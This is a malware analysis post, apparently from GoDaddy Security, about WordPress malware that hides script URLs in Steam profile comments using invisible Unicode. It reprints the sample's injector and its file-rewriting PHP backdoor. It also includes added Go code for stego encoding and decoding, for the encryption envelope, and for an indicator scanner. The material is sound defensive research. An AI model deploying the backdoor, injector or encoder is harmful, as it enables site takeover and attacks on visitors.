---
title: "Malware Targeting WordPress Abuses Steam Community Profiles for Command & Control Operations"
date: "2026-05-28T10:34:03"
url: "https://www.godaddy.com/resources/news/malware-targeting-wordpress-abuses-steam-community-profiles"
---
# Malware Targeting WordPress Abuses Steam Community Profiles for Command & Control Operations

## Key findings

- GoDaddy Security researchers have identified malware that uses Steam Community profile comments to host encoded command and control data, hiding malicious infrastructure behind Valve's legitimate platform.
- The malware employs invisible Unicode characters to conceal payloads within Steam profile comments, enabling steganographic data encoding that evades traditional text-based detection methods.
- Technical implementation includes AES-256-CTR encryption with PBKDF2 key derivation and HMAC authentication to protect command and control communications.
- A cookie-authenticated backdoor enables remote code execution, allowing attackers to modify plugin and theme files by sending base64-encoded PHP code via POST requests.

## Overview

GoDaddy Security researchers have analyzed malware that uses an unconventional approach to command and control: encoding malicious payloads for WordPress within Steam Community profile comments. This technique allows threat actors to hide their infrastructure behind Valve's trusted gaming platform rather than maintaining obviously malicious servers.

The malware performs two primary functions:

1. Client-side JavaScript injection: Fetches encoded URLs from Steam profile comments, decodes them, and injects external JavaScript into WordPress pages
2. Server-side backdoor: Provides cookie-authenticated remote access for modifying PHP files across plugins and themes

The campaign was first observed by GoDaddy Security in July 2025, and the malware has since been detected on approximately 1,980 WordPress sites. Analysis of the code sample and observed behavior forms the basis of this technical breakdown.

## Technical analysis

### Attack chain overview

The malware implements two parallel attack chains:

**Client-side chain:**

1. Fetch Steam Community profile page using cURL
2. Extract content from the **commentthread_comment_text** div
3. Decode hidden payload using steganography and optional encryption
4. Inject decoded URL as JavaScript using **wp_enqueue_script()** with the **asahi-jquery-min-bundle** handle

**Server-side chain:**

1. Hook into the WordPress **template_redirect** action
2. Check for authentication cookies on POST requests
3. Return a ping response or perform a code modification, depending on which cookie is present
4. Search and replace code in plugin/theme files when instructed

### Stage 1: Steam profile fetching

The malware uses WordPress page loads to trigger HTTP requests to Steam Community profiles. The code uses cURL with the following configuration:

```php
function Ce8d26cADf211699($url) {
    $cache_key = "caption_" . md5($url);

    $curl = curl_init($url);
    curl_setopt_array($curl, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        CURLOPT_TIMEOUT => 10,
        CURLOPT_SSL_VERIFYPEER => false,   // certificate chain not checked
        CURLOPT_SSL_VERIFYHOST => 0        // hostname not checked
    ]);

    $html = curl_exec($curl);

    // Extract the first commentthread_comment_text div from the profile page
    if (preg_match("/<div[^>]*class=[\"']commentthread_comment_text[\"'][^>]*>(.*?)<\/div>/is",
                   $html, $matches)) {
        $content = $matches[1];
        set_transient($cache_key, $content, 300);   // keep a copy for 5 minutes
        return $content;
    }

    // Fetch or parse failed: serve the last cached comment instead
    return get_transient($cache_key);
}
```

The malware has been observed fetching the following Steam profiles:

- https://steamcommunity[.]com/profiles/76561199096946028/
- https://steamcommunity[.]com/id/ravypadliha
- https://steamcommunity[.]com/id/enomisvool123/
- https://steamcommunity[.]com/id/eremohin342

The extracted content is stored as a WordPress transient with a 5-minute expiration. In the code shown, the live fetch always runs first and the cached copy is returned only when the fetch or the regex fails, so the transient acts as a fallback that keeps the last payload available rather than as a rate limiter on requests to Steam.

#### Malware disguised as ASCII art comments

![a screenshot of a computer](https://www.godaddy.com/resources/wp-content/uploads/2026/05/ascii_art_comment1.png?size=1024x1024)

![Comment spam](https://www.godaddy.com/resources/wp-content/uploads/2026/05/ascii_art_comment-1.png?size=1024x1024)

![Example of Steam commentthread_comment_text content](https://www.godaddy.com/resources/wp-content/uploads/2026/05/ascii_art_comment_inspect.png?size=1024x1024)

**Example of Steam commentthread_comment_text content**

### Stage 2: Steganographic decoding

After extracting the Steam comment text, the malware processes it through a decoder that handles two encoding methods: invisible Unicode steganography and optionally encrypted payloads.

#### Unicode steganography

The decoder uses six invisible Unicode characters to encode binary data:

```php
$invisible_chars = [
    "\u{200C}",  // Zero-width non-joiner (U+200C)
    "\u{200D}",  // Zero-width joiner (U+200D)
    "\u{2061}",  // Function application (U+2061)
    "\u{2062}",  // Invisible times (U+2062)
    "\u{2063}",  // Invisible separator (U+2063)
    "\u{2064}"   // Invisible plus (U+2064)
];
```

After removing all visible decoy characters, the decoder is left with only the invisible Unicode sequence (the encoded payload). Depending on the sample, the decoded bytes may then be decrypted using the optional crypto routine described below.

The invisible sequence extracted from one comment, listed by code point:

```text
U+2062, U+2064, U+200C, U+2062, U+200C, U+2061, U+2063, U+2064, U+200D, U+200C, U+2064, U+200D, U+200C, U+200C, U+2061, U+200D, U+200C, U+200D, U+2061, U+200C, U+2061, U+200D, U+2061, U+200D, U+2064, U+2061, U+200D, U+200C, U+2062, U+2061, U+200D, U+2062, U+2064, U+200C, U+2062, U+200C, U+2061, U+200C, U+2062, U+2064, U+200C, U+2064, U+2061, U+200D, U+2064, U+2061, U+200C, U+2063, U+2062, U+200D, U+200C, U+200D, U+2061, U+200C, U+2062, U+2062, U+2061, U+200C, U+2061, U+200C, U+2062, U+200D, U+200C, U+200C, U+2061, U+200D, U+2062, U+200C, U+2061, U+200D, U+2061, U+2062, U+2061, U+200D, U+200C, U+200D, U+2062, U+200D, U+200C, U+200C, U+2061, U+200C, U+2062, U+200C, U+2061, U+200D, U+200C, U+200C, U+2061, U+200D, U+2062, U+200C, U+2061, U+2063, U+200C, U+2061, U+200D, U+2064, U+2061, U+200C, U+2061, U+2062, U+2062, U+200D, U+200C, U+200D, U+2061, U+200D, U+200C, U+2064, U+2063, U+2064, U+200D, U+200C, U+200D, U+2062, U+200D, U+200C, U+200D, U+2061, U+2063, U+200D, U+2061, U+200C, U+2062, U+200C
```

The decoding process:

1. Scan the text and keep only characters from the invisible alphabet above, discarding the visible decoys
2. Map each retained character to its index in the alphabet (0-5)
3. Pack the index stream into a bit stream and regroup it into bytes (two bits per character would cover only four symbols; a six-symbol alphabet needs a packing rule specific to the decoder)
4. Apply a bitwise NOT operation to each byte (~byte & 0xFF)
5. Attempt gzip decompression if the output contains non-printable characters

This encoding allows binary data to be embedded within normal-looking text. The visible characters serve as camouflage while the invisible characters carry the actual payload.
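As an added example (not code from the sample or from GoDaddy), the following Go program implements both directions of the pipeline above so the encoding can be inspected on constructed input. It keeps the sample's six-character alphabet but, because the page does not pin down how six symbols pack into bytes, it assumes two bits per character using the first four characters (U+200C, U+200D, U+2061, U+2062) and reports an error when it meets U+2063 or U+2064 rather than guessing. The decoy text, the payload string and the gzip option are constructed for the demonstration.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"fmt"
	"io"
	"strings"
)

// The sample's six invisible code points; index = symbol value.
var invisibleAlphabet = []rune{'\u200C', '\u200D', '\u2061', '\u2062', '\u2063', '\u2064'}
var symbolIndex = map[rune]int{'\u200C': 0, '\u200D': 1, '\u2061': 2, '\u2062': 3, '\u2063': 4, '\u2064': 5}

// Assumption: only the first four symbols carry data, two bits each; the page
// does not say how the decoder packs six symbols into bytes.
const dataSymbols = 4

func gzipBytes(p []byte) []byte {
	var buf bytes.Buffer
	zw := gzip.NewWriter(&buf)
	zw.Write(p)
	zw.Close()
	return buf.Bytes()
}

// encodeStego hides payload in decoy text: invert each byte (the decoder's
// ~byte & 0xFF undoes it), emit four two-bit symbols, and follow each symbol
// with the next visible decoy rune so the comment still reads as text.
func encodeStego(payload []byte, decoy string, compress bool) string {
	if compress {
		payload = gzipBytes(payload)
	}
	decoyRunes := []rune(decoy)
	var sb strings.Builder
	di := 0
	for _, b := range payload {
		b = ^b
		for shift := 6; shift >= 0; shift -= 2 {
			sb.WriteRune(invisibleAlphabet[(b>>uint(shift))&3])
			if di < len(decoyRunes) {
				sb.WriteRune(decoyRunes[di])
				di++
			}
		}
	}
	sb.WriteString(string(decoyRunes[di:]))
	return sb.String()
}

// stripInvisible returns what a reader sees: the text without alphabet runes.
func stripInvisible(text string) string {
	var sb strings.Builder
	for _, r := range text {
		if _, hidden := symbolIndex[r]; !hidden {
			sb.WriteRune(r)
		}
	}
	return sb.String()
}

// decodeStego follows the page's steps: keep alphabet runes, map to indices,
// pack four per byte, invert, gunzip if the result is not printable.
// Out-of-range symbols are reported rather than silently mis-packed.
func decodeStego(text string) ([]byte, error) {
	var symbols []int
	for _, r := range text {
		if i, ok := symbolIndex[r]; ok {
			symbols = append(symbols, i)
		}
	}
	if len(symbols) == 0 || len(symbols)%4 != 0 {
		return nil, fmt.Errorf("stego: %d hidden symbols is not a whole number of bytes", len(symbols))
	}
	out := make([]byte, 0, len(symbols)/4)
	for i := 0; i < len(symbols); i += 4 {
		var b byte
		for _, s := range symbols[i : i+4] {
			if s >= dataSymbols {
				return nil, fmt.Errorf("stego: U+%04X is outside the two-bit alphabet; this sample packs differently", invisibleAlphabet[s])
			}
			b = b<<2 | byte(s)
		}
		out = append(out, ^b)
	}
	nonPrintable := bytes.IndexFunc(out, func(r rune) bool {
		return (r < 0x20 && r != '\n' && r != '\r' && r != '\t') || r > 0x7E
	}) >= 0
	if nonPrintable {
		if zr, err := gzip.NewReader(bytes.NewReader(out)); err == nil {
			if plain, err := io.ReadAll(zr); err == nil {
				return plain, nil
			}
		}
	}
	return out, nil
}

func main() {
	comment := encodeStego([]byte("example.invalid/js/lodash.core.min.js"), "gg, nice profile :)", true)
	fmt.Printf("visible text: %q\n", stripInvisible(comment))
	hidden, err := decodeStego(comment)
	fmt.Printf("hidden payload: %q (err=%v)\n", hidden, err)
}
```

Running it prints the decoy text unchanged and the recovered payload. The error path is the part worth keeping in analyst tooling: a decoder that silently packs six symbols into two bits produces plausible-looking garbage instead of an obvious failure, which is exactly the situation a sample with a different packing rule would create.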

#### Encryption layer

The malware includes code to handle encrypted payloads, though the encryption is optional:

```php
function EdF20922Ff709e68($encoded_data, $password = '') {
    // $encoded_data holds the bytes recovered by the steganographic decoder;
    // the sample's own input handling is not reproduced in this excerpt
    $decoded = $encoded_data;

    // Extract salt (8 bytes), HMAC (32 bytes), and ciphertext
    $salt = substr($decoded, 0, 8);
    $hmac = substr($decoded, 8, 32);
    $ciphertext = substr($decoded, 40);

    // Derive 48 bytes using PBKDF2 with SHA-512, 10,000 iterations
    $key_material = hash_pbkdf2('sha512', $password, $salt, 10000, 48, true);
    $iv = substr($key_material, 0, 16);
    $key = substr($key_material, 16, 32);

    // Decrypt using AES-256-CTR
    $plaintext = openssl_decrypt($ciphertext, 'aes-256-ctr', $key,
                                 OPENSSL_RAW_DATA, $iv);

    // Verify HMAC-SHA256 over the plaintext, keyed with the AES key
    $computed_hmac = hash_hmac('sha256', $plaintext, $key, true);
    if (!hash_equals($hmac, $computed_hmac)) {
        return '';
    }

    return $plaintext;
}
```

The encryption implementation uses:

- PBKDF2 key derivation with SHA-512, 10,000 iterations, producing 48 bytes that are split into a 16-byte IV and a 32-byte key
- AES-256-CTR mode for encryption
- HMAC-SHA256 over the plaintext, keyed with the same AES key, for authentication
- Constant-time comparison (hash_equals) for HMAC verification

Two caveats matter for analysis. The injector calls this function without a password, so **$password** is the empty string and the IV and key are a deterministic function of the salt carried in the payload itself: anyone holding the comment text can decrypt it. The layer therefore provides integrity (a tampered or truncated comment fails the HMAC and yields an empty string, which the injector then cannot validate as a URL) and obfuscation, not confidentiality. The MAC is also computed over the plaintext with the encryption key rather than over the ciphertext with a separate key, which is not the encrypt-then-MAC construction expected of a carefully designed protocol.
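The following Go program is an added example, not the sample's code, that reproduces the envelope layout above (salt, HMAC, ciphertext) with the same derivation parameters, so the consequences can be checked directly: with an empty password the blob decrypts from its own salt, and a single flipped ciphertext byte is rejected by the HMAC. PBKDF2-HMAC-SHA-512 is written inline so the program needs only the standard library; the salt, the message and the function names (seal, unseal, deriveIVKey) are constructed for the example.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha256"
	"crypto/sha512"
	"encoding/hex"
	"errors"
	"fmt"
)

const (
	saltLen    = 8
	tagLen     = 32
	iterations = 10000
	keyMatLen  = 48 // 16-byte IV followed by 32-byte AES-256 key, as in the sample
)

// pbkdf2SHA512 is PBKDF2 (RFC 8018) over HMAC-SHA-512, written inline so the
// example needs only the standard library; real tooling should use x/crypto.
func pbkdf2SHA512(password, salt []byte, iter, dkLen int) []byte {
	var dk []byte
	for block := uint32(1); len(dk) < dkLen; block++ {
		mac := hmac.New(sha512.New, password)
		mac.Write(salt)
		mac.Write([]byte{byte(block >> 24), byte(block >> 16), byte(block >> 8), byte(block)})
		u := mac.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			mac.Reset()
			mac.Write(u)
			u = mac.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		dk = append(dk, t...)
	}
	return dk[:dkLen]
}

// deriveIVKey mirrors the sample: 48 bytes of PBKDF2 output, iv = [0:16], key = [16:48].
func deriveIVKey(password, salt []byte) (iv, key []byte) {
	km := pbkdf2SHA512(password, salt, iterations, keyMatLen)
	return km[:16], km[16:keyMatLen]
}

// seal produces salt(8) || HMAC-SHA256(key, plaintext)(32) || AES-256-CTR(plaintext).
// The salt is a parameter so tests are reproducible; a real encoder draws it from crypto/rand.
func seal(plaintext, password, salt []byte) ([]byte, error) {
	if len(salt) != saltLen {
		return nil, errors.New("salt must be 8 bytes")
	}
	iv, key := deriveIVKey(password, salt)
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	ct := make([]byte, len(plaintext))
	cipher.NewCTR(block, iv).XORKeyStream(ct, plaintext)
	mac := hmac.New(sha256.New, key)
	mac.Write(plaintext)
	out := append([]byte{}, salt...)
	out = append(out, mac.Sum(nil)...)
	return append(out, ct...), nil
}

// unseal is the page's decoder in Go: split the envelope, derive IV and key from
// the embedded salt, decrypt, then check the HMAC over the plaintext in constant time.
func unseal(envelope, password []byte) ([]byte, error) {
	if len(envelope) < saltLen+tagLen {
		return nil, errors.New("envelope shorter than salt+HMAC")
	}
	salt, tag, ct := envelope[:saltLen], envelope[saltLen:saltLen+tagLen], envelope[saltLen+tagLen:]
	iv, key := deriveIVKey(password, salt)
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCTR(block, iv).XORKeyStream(pt, ct)
	mac := hmac.New(sha256.New, key)
	mac.Write(pt)
	if !hmac.Equal(tag, mac.Sum(nil)) {
		return nil, errors.New("HMAC mismatch: tampered envelope or wrong password")
	}
	return pt, nil
}

func main() {
	salt := []byte{0xde, 0xad, 0xbe, 0xef, 0x00, 0x01, 0x02, 0x03} // constructed, not from a sample
	env, _ := seal([]byte("example.invalid/js/lodash.core.min.js"), nil, salt)
	fmt.Println("envelope:", hex.EncodeToString(env))
	pt, err := unseal(env, nil) // empty password, exactly how the injector calls the decoder
	fmt.Printf("plaintext: %q err=%v\n", pt, err)
}
```

Because nothing secret enters the derivation, an analyst can decrypt any comment this variant posts by reading the salt off its first eight bytes; the operator, conversely, gets a guarantee that an edited or truncated comment is discarded rather than turned into a broken script tag.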

### Stage 3: JavaScript injection

The decoded payload is used to construct a URL, which is then injected into WordPress pages:

```php
function G7jp2L84mnVc4LNW9wcbZcaVFAyC9N72() {
    // The fetched comment passes through the steganographic decoder before the
    // decryption routine; that intermediate step is omitted from this excerpt
    $url = "https://" . EdF20922Ff709e68(
        Ce8d26cADf211699("https://steamcommunity.com/profiles/76561199096946028/")
    );

    // An empty or tampered payload leaves only "https://", which fails validation
    if (filter_var($url, FILTER_VALIDATE_URL)) {
        wp_enqueue_script(
            "asahi-jquery-min-bundle",   // handle
            $url,                        // external script source
            array(),                     // no dependencies
            null,                        // no ?ver= query string
            true                         // load in footer
        );
    }
}

add_action("wp_enqueue_scripts", "G7jp2L84mnVc4LNW9wcbZcaVFAyC9N72");
```

The decoded URL observed during analysis: hxxps://hello-mywordl[.]info/js/lodash[.]core[.]min[.]js

![PublicWWW results showing websites loading hello-mywordl.info](https://www.godaddy.com/resources/wp-content/uploads/2026/05/hello_mywordl_info.jpg?size=1024x1024)

*PublicWWW results showing websites loading **hello-mywordl[.]info***

The script is loaded on every WordPress frontend page via the **wp_enqueue_scripts** hook, with a **null** version (so no **?ver=** query string is appended) and **$in_footer** set to true (so the tag is emitted near the end of the body). The handle name "asahi-jquery-min-bundle" and filename "lodash.core.min.js" mimic legitimate JavaScript libraries.

### Stage 4: Server-side backdoor

The malware implements a backdoor that responds to POST requests carrying one of two cookies. Only the presence of a cookie is checked (**isset()**); its value is never compared against anything, so the "authentication" consists solely of knowing the cookie name.

```php
add_action("template_redirect", "mpzZYIbGOb");

function mpzZYIbGOb() {
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        if (isset($_COOKIE['DEpjndDbNc'])) {
            // Ping/version response (branch shown below)
            handle_ping();
        } elseif (isset($_COOKIE['tEcaKKXEsb'])) {
            // Code modification (branch shown below)
            handle_code_update();
        }
    }
}
```

#### Backdoor function 1: Ping/keepalive

When the DEpjndDbNc cookie is present, the backdoor responds with:

```php
if (isset($_COOKIE['DEpjndDbNc'])) {
    if (ob_get_length()) ob_clean();   // discard any page output already buffered

    header('Content-Type: text/plain');
    echo "OK\n";
    echo "V:1767964512";
    exit;
}
```

This provides a method to verify the backdoor is operational and retrieve a version identifier. The value 1767964512 is a Unix timestamp (9 January 2026 UTC), so the "version" reads as a build or deployment date.

#### Backdoor function 2: Remote code execution

When the **tEcaKKXEsb** cookie is present, the backdoor accepts base64-encoded PHP code via POST parameter:

```php
if (isset($_COOKIE['tEcaKKXEsb'])) {
    if (!isset($_POST['new_code'])) {
        http_response_code(400);
        echo "Invalid input";
        exit;
    }

    $new_code = base64_decode($_POST['new_code']);

    // Search plugins directory for marker string
    $result = search_and_replace_in_files(
        WP_CONTENT_DIR . '/plugins',
        base64_decode('RzdqcDJMODRtblZjNExOVzl3Y2JaY2FWRkF5QzlONzI='),
        $new_code
    );

    // Search themes directory for marker string
    $result .= search_and_replace_in_files(
        WP_CONTENT_DIR . '/themes',
        base64_decode('RzdqcDJMODRtblZjNExOVzl3Y2JaY2FWRkF5QzlONzI='),
        $new_code
    );

    header('Content-Type: text/plain');
    echo "OK\n";
    echo $result;
    exit;
}
```

The marker string decodes to: G7jp2L84mnVc4LNW9wcbZcaVFAyC9N72 (the function name used for script injection).

The file modification function searches recursively through plugin and theme directories. It rewrites the first line containing the marker in the first file where the marker appears and then returns, so each request changes exactly one line in one file. Because the marker is the injector's function name, the line replaced is one that references that function, and the supplied **new_code** must be valid PHP in that position or the file stops parsing:

```php
function search_and_replace_in_files($directory, $search_string, $replacement) {
    // recursively_list_files() is the sample's directory walker (not reproduced
    // here); it returns every file path below $directory
    $files = recursively_list_files($directory);

    foreach ($files as $file) {
        $lines = file($file);

        foreach ($lines as $line_num => $line) {
            if (strpos($line, $search_string) !== false) {
                // Replace the whole matching line with the attacker-supplied code
                $lines[$line_num] = $replacement . PHP_EOL;
                file_put_contents($file, implode('', $lines));

                // First match only: one request changes one line in one file
                return "Found and replaced in: $file on line " . ($line_num + 1);
            }
        }
    }

    return '';   // marker not found in this tree
}
```

This mechanism allows attackers to:

- Replace existing malware code with updated versions
- Modify the injected script URL without re-compromising the site
- Maintain persistence after partial cleanup attempts

## Code obfuscation techniques

The malware employs several obfuscation methods to evade detection:

### String encoding

All string constants use octal or hexadecimal escape sequences:

```php
// Octal encoding examples
"\143\x55\x52\x4c"                          // "cURL"
"\167\160\137\145\156\161\x75\x65\165\x65"  // "wp_enqueue"

// Hexadecimal encoding examples
"\x68\164\164\160\163\x3a\x2f\x2f"          // "https://"
"\x73\x74\x65\x61\x6d\143\x6f\x6d"          // "steamcom"
```

This prevents simple text searches from identifying suspicious strings like URLs or function names.

### Randomized identifiers

Function and variable names use mixed-case hexadecimal-style naming:

```text
Bb6621c281Bd67C7       // Logger function (disabled)
Ce8d26cADf211699       // Steam fetcher
fE51D3035bbc1fC8       // Cache retrieval
a7b52DEAAB65BdeA       // HTML entity decoder
EdF20922Ff709e68       // Cryptographic decoder
G7jp2L84mnVc4LNW9wcbZcaVFAyC9N72  // Script injector
mpzZYIbGOb             // Backdoor handler
```

These names appear random but remain consistent across infections.

### Decoy code

The malware includes a non-functional logging system:

```php
function Bb6621c281Bd67C7($log_data) {
    $enabled = false;  // Hardcoded to false

    if (WP_DEBUG && WP_DEBUG_LOG && $enabled) {
        error_log(print_r($log_data, true));
    }
}
```

The **$enabled** variable is hardcoded to false, ensuring the logging never executes. Calls to this function are scattered throughout the code:

```php
Bb6621c281Bd67C7("Fetching content from URL: $url");
Bb6621c281Bd67C7("Caption cached under key: $cache_key");
```

This creates the appearance of debugging infrastructure without providing any functionality.

### WordPress API usage

The malware uses standard WordPress and PHP functions throughout:

```text
wp_enqueue_script()      // JavaScript injection (WordPress)
add_action()             // Hook registration (WordPress)
get_transient()          // Cache retrieval (WordPress)
set_transient()          // Cache storage (WordPress)
curl_init()              // HTTP requests (PHP cURL extension)
file_get_contents()      // File reading (PHP)
file_put_contents()      // File writing (PHP)
```

This mimics legitimate plugin behavior patterns, making behavioral detection more difficult.

## Infection vector

The malware does not appear to exploit a specific WordPress core, plugin, or theme vulnerability. The most likely infection methods are:

1. Stolen WordPress admin credentials - Attackers log in with legitimate credentials and manually install malicious code
2. Compromised FTP/SFTP credentials - Direct file system access allows code injection
3. Vulnerable plugin or theme - Exploitation of unpatched security vulnerabilities
4. Supply chain compromise - Malicious code in third-party plugins or themes

## Detection and response

Security teams can identify this malware through several key indicators:

The malware was discovered in **/wp-content/themes/gt3-child/functions.php** but can appear in any PHP file.

File-based detection should focus on searching WordPress plugin and theme directories for:

- references to steamcommunity.com, bearing in mind that the string may be split across escape-encoded fragments
- arrays of invisible Unicode characters (U+200C, U+200D, U+2061 through U+2064)
- cryptographic functions such as hash_pbkdf2 and openssl_decrypt used with AES-256-CTR
- disabled TLS verification (CURLOPT_SSL_VERIFYPEER set to false), a weak indicator on its own since careless legitimate code does the same

Network monitoring should alert on outbound connections from WordPress servers to Steam Community, JavaScript loading from non-CDN domains like hello-mywordl[.]info, and POST requests carrying the backdoor cookies (DEpjndDbNc or tEcaKKXEsb) or a new_code parameter. WordPress-specific indicators include transient cache entries with the _transient_caption_ prefix and enqueued scripts pointing to external URLs.
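To make the escape-sequence encoding described under Code obfuscation techniques searchable and to apply the file-based indicators above in a single pass, here is an added Go scanner (not GoDaddy's tooling and not part of the original page). It decodes PHP octal and hex escapes, joins literals split with the concatenation operator, decodes base64 literals such as the replacement marker, and then matches the indicators named on this page: Steam Community references, the invisible-character alphabet, hash_pbkdf2 and AES-256-CTR, disabled TLS verification, the injector marker and script handle, the backdoor cookie names, and the hello-mywordl[.]info host. The two PHP snippets inside it are constructed, not real samples; the regular expressions, the minimum base64 length and the decision to treat literal zero-width characters as a weak indicator are the editor's assumptions. The database-side indicator (transients with the _transient_caption_ prefix) needs a query against wp_options and is not covered here.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"regexp"
	"strconv"
	"strings"
)

// PHP double-quoted octal (\143) and hex (\x55) escapes; glue between adjacent
// literals ("abc" . "def"); quoted literals that look like base64.
var (
	escapeRe = regexp.MustCompile(`\\x[0-9A-Fa-f]{1,2}|\\[0-7]{1,3}`)
	concatRe = regexp.MustCompile(`["']\s*\.\s*["']`)
	base64Re = regexp.MustCompile(`["']([A-Za-z0-9+/]{20,}={0,2})["']`)
)

// Indicators named on the page. Literal zero-width characters also occur in
// legitimate text, so that rule is weak on its own (editor's assumption).
var indicators = []struct {
	name string
	re   *regexp.Regexp
}{
	{"fetches steamcommunity.com", regexp.MustCompile(`steamcommunity\.com`)},
	{"invisible Unicode alphabet", regexp.MustCompile(`\\u\{(200[CDcd]|206[1-4])\}|[\x{200C}\x{200D}\x{2061}-\x{2064}]`)},
	{"PBKDF2 + AES-256-CTR decoder", regexp.MustCompile(`hash_pbkdf2|aes-256-ctr`)},
	{"TLS peer verification disabled", regexp.MustCompile(`CURLOPT_SSL_VERIFYPEER\s*=>\s*false`)},
	{"injector marker or script handle", regexp.MustCompile(`G7jp2L84mnVc4LNW9wcbZcaVFAyC9N72|asahi-jquery-min-bundle`)},
	{"backdoor cookie names", regexp.MustCompile(`DEpjndDbNc|tEcaKKXEsb`)},
	{"known payload host", regexp.MustCompile(`hello-mywordl\.info`)},
}

// normalize undoes the string obfuscation so plain-text indicators match:
// decode escapes, join split literals, append decoded base64 literals.
func normalize(src string) string {
	plain := escapeRe.ReplaceAllStringFunc(src, func(m string) string {
		var v int64
		if m[1] == 'x' {
			v, _ = strconv.ParseInt(m[2:], 16, 16)
		} else {
			v, _ = strconv.ParseInt(m[1:], 8, 16)
		}
		return string(rune(v))
	})
	plain = concatRe.ReplaceAllString(plain, "")
	var decoded []string
	for _, m := range base64Re.FindAllStringSubmatch(src, -1) {
		if b, err := base64.StdEncoding.DecodeString(m[1]); err == nil {
			decoded = append(decoded, string(b))
		}
	}
	return plain + "\n" + strings.Join(decoded, "\n")
}

// scan returns the names of the indicators matching one file's source.
func scan(src string) []string {
	norm := normalize(src)
	var hits []string
	for _, ind := range indicators {
		if ind.re.MatchString(norm) {
			hits = append(hits, ind.name)
		}
	}
	return hits
}

// scanTree walks root (for example wp-content) and reports every .php file with hits.
func scanTree(root string) (map[string][]string, error) {
	results := map[string][]string{}
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil || d.IsDir() || !strings.HasSuffix(path, ".php") {
			return err
		}
		data, err := os.ReadFile(path)
		if err != nil {
			return err
		}
		if hits := scan(string(data)); len(hits) > 0 {
			results[path] = hits
		}
		return nil
	})
	return results, err
}

// Constructed snippets in the style the page describes; neither is a real sample.
const obfuscatedSample = `<?php
$u = "\x68\164\164\160\163\x3a\x2f\x2f" . "\x73\x74\x65\x61\x6d\143\x6f\x6d" . "munity.com/id/example";
$m = base64_decode('RzdqcDJMODRtblZjNExOVzl3Y2JaY2FWRkF5QzlONzI=');
if (isset($_COOKIE['DEpjndDbNc'])) { echo "OK"; }
curl_setopt_array($c, [CURLOPT_SSL_VERIFYPEER => false]);`

const cleanSample = `<?php
wp_enqueue_script('my-theme-app', get_template_directory_uri() . '/js/app.js', array('jquery'), '1.0', true);`

func main() {
	fmt.Println("obfuscated sample:", scan(obfuscatedSample))
	fmt.Println("clean sample:", scan(cleanSample))
}
```

Run against a real installation by calling scanTree with the wp-content path; the constructed sample trips four rules (the Steam reference reassembled from escapes and split literals, the marker recovered from base64, a cookie name, and the disabled certificate check) while the clean theme snippet trips none. The normalization step is what separates this from a plain grep: on the obfuscated source a search for steamcommunity.com finds nothing, on the normalized text it does.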

If an infection is detected, site administrators should first document the compromise by backing up the infected installation and preserving server access logs before making any changes. Enable maintenance mode to prevent visitor exposure to injected JavaScript. Update all credentials including WordPress admin accounts, database passwords, FTP/SFTP access, hosting control panel logins, and SSH keys. Review server logs for evidence of backdoor usage by searching for the authentication cookie names and POST parameters named new_code, which indicate active exploitation of the remote code execution capability. Note that default web-server access logs record neither cookies nor POST bodies; unless a custom log format or a WAF captured them, the backdoor's traffic will appear only as POST requests to ordinary front-end URLs.

Cleanup should prioritize restoration from a known-clean backup predating the infection whenever possible. If backups are unavailable or unreliable, manual remediation requires searching for and removing malicious code from all plugin and theme files, clearing suspicious WordPress transients from the database, verifying that no malicious scripts remain enqueued, and updating WordPress core along with all plugins and themes to current versions. The remote code rewriting capability means partial cleanup may be insufficient—attackers can reinstall removed code through the backdoor if any component remains active.

## GoDaddy detection and protection

GoDaddy's [website security solutions](https://www.godaddy.com/web-security/website-security) help protect against this type of malware through signature-based detection and automated scanning.

GoDaddy Security can:

- Monitor for new variants
- Update detection signatures
- Analyze emerging patterns
- Share intelligence with the security community

## Conclusion

This malware campaign demonstrates an unusual approach to command and control: encoded payloads for WordPress malware are hosted in Steam Community profile comments. The use of invisible Unicode steganography, combined with optional AES-256-CTR encryption, allows attackers to hide malicious data in plain sight on Valve's trusted platform.

The malware's two-stage operation (client-side JavaScript injection and server-side backdoor) provides both immediate visitor impact and long-term persistent access. The cookie-authenticated backdoor's ability to remotely rewrite code allows attackers to maintain access even after detection and partial cleanup.

**Key technical characteristics:**

1. Steam Community abuse: Uses Valve's platform for C2 rather than maintaining separate malicious infrastructure
2. Steganographic encoding: Embeds binary data using invisible Unicode characters
3. Cryptographic protection: Implements AES-256-CTR with PBKDF2 key derivation and HMAC authentication
4. Remote code execution: Cookie-authenticated backdoor enables file modification via POST requests
5. Multi-layer obfuscation: Combines string encoding, randomized identifiers, decoy code, and WordPress API usage

## GoDaddy's commitment

GoDaddy Security continues to monitor this threat and updates detection signatures as new variants are identified. We have successfully detected and remediated infections across our customer base and continue to share intelligence with the broader security community.